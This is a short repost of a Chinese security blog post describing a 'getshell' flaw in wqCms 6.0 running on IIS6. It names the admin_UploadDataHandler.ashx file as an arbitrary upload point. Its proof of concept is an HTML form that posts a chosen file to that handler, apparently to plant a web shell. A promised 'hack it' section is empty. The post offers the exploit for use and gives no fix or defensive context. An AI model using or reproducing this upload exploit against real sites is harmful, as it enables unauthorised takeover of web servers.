📂Hacker
🔖Hacker
2017-02-22 21:21阅读: 507评论: 0推荐: 0

wqCms6.0在IIS6的Getshell

2017-02-15发布

一、漏洞利用点

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

二、hack it


三、POC

<html>
    <body>
        <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
            <input  type="file" name="uploadify" />
            <input  type="text" name="saveFile" value="admin" />
            <input type="submit" name="Upload" value="Submit Query" />
        </form>
    </body>
</html>

转自群友论坛文章wobushou

本文作者:Akkuman

本文链接:https://www.cnblogs.com/Akkuman/p/6959308.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   Akkuman  阅读(507)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
AI IDE Trae
💬
评论
📌
收藏
💗
关注
👍
推荐
🚀
回顶
收起
  1. 1 404 not found REOL
404 not found - REOL
00:00 / 00:00
An audio error has occurred.